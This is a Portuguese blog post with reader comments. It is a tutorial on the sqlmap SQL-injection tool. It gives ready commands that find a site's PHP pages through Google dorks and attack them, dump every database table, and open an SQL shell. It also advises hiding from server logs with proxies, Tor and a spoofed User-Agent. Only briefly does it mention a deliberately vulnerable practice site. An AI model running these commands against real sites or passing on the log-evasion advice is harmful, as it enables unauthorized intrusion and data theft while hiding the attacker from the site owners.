quinta-feira, 30 de dezembro de 2010

Sqlmap - Testes de SQL Injection

O sqlmap é uma ferramenta para testes de SQL injection, com suporte a banco de dados MySql, Oracle, PostgreSQL e Microsoft SQL Server. Apenas vou demonstrar neste post alguns testes, essa ferramenta é muito poderosa e super flexível, recomendo a leitura do manual e do help (sqlmap -h).

Tem uma opção que acho fantástica, que é a busca por Google Dorks. Você informa o site onde você deseja realizar o teste e o dorks que você quer que o sqlmap use para buscar no site. O comando abaixo vai fazer com que o sqlmap faça uma busca no site informado por páginas em php e quando ele tiver uma lista considerável ele começa a tentar realizar os ataques.

#sqlmap -g “site:www.siteaqui.com.br ext:php”

Adicionando “--dump-all” ele fará um dump das tabelas do banco e mostrara também a versão do banco. O comando ficaria assim:

# sqlmap --dump-all  -g “site:www.siteaqui.com.br ext:php”

Um teste simples seria:

#sqlmap.py --dump-all -u "site.com.br"

Já pensou em conseguir uma Shell utilizando uma vulnerabilidade de Injection? Pois é, o sqlmap faz isso pra você:

#sqlmap --sql-shell -g “site:www.siteaqui.com.br ext:php”

Você pode realizar seus testes no site vulnerável da Acunetix que tem o propósito de testar suas habilidades e testar ferramentas:

http://testphp.vulnweb.com/

Não se esqueça de usar algum Proxy para que o seu IP não seja registrado no log do servidor e mude também o “User-Agent” para que no log não apareça este campo como “sqlmap”. Para realizar isso execute o comando abaixo:

#sqlmap --sql-shell -g “site:www.siteaqui.com.br ext:php” --user-agent=”Mozilla/5.0” --proxy=”http://algumproxy.com:8080”

Faça uma busca pelo google e você encontrara uma lista de proxys ou use a rede TOR. Para mais informações sobre a rede TOR veja os links abaixo:

- Post do CABELO no vivaolinux explicando sobre o TOR
- Site oficial do projeto
- Plugin do Firefox que habilita/desabilita o TOR
- XeroBank - browser que utiliza a rede TOR para navegação anonima
- Vídeo sobre Sqlmap + TOR

Veja esse ótimo vídeo sobre o Sqlmap:

Video: http://vimeo.com/4634556

by Osvaldo H Peixoto
Postado por às

2 comentários:

  1. Anônimo25 de fevereiro de 2011 às 14:12

    Caraca velhinho, gostei muito...
    estou tentando encontrar algum tuto para usar o sqlmap e testar alguns sites de clientes meu mas não encontrei nenhum tuto completinho.

    Continuo com algumas duvidas, teria como você me ajudar? Sou novo na área e gostaria de saber melhor como suar o SQLMap...tipo..onde eu coloco esses códigos acima? em que arquivo da pasta sqlmap tem isso? em fim...um tuto mais para iniciantes mesmo...hehehe

    Abraços

    ResponderExcluir
  2. Osvaldo28 de fevereiro de 2011 às 09:15

    Primeiramente gostaria de agradecer pelo comentário :-)

    Eu sugiro que você aprofunde seu conhecimento na técnica de SQL Injection, leia tudo sobre o assunto, desta forma se torna fácil entender como funciona as ferramtenas que automatizam os ataques de SQLi. Segue alguns links abaixo para lhe ajudar:

    1 – Primeiro Paper sobre SQLi
    http://osvaldohp.blogspot.com/2011/01/sql-injection-aprenda-com-o-mestre.html

    2 - Lista de ferramentas
    http://osvaldohp.blogspot.com/2011/01/sql-injection-tools.html

    3 - Sql na prática
    http://osvaldohp.blogspot.com/2010/12/sql-injection-na-pratica.html

    4 – Videos do site oficial do sqlmap http://sqlmap.sourceforge.net/demo.html

    5 - Documento oficial sobre o sqlmap
    http://sqlmap.sourceforge.net/#docs

    Visite o site OWASP, porém no memento esta fora do ar.

    Qualquer dúvida.....

    ResponderExcluir

Assinar: Postar comentários (Atom)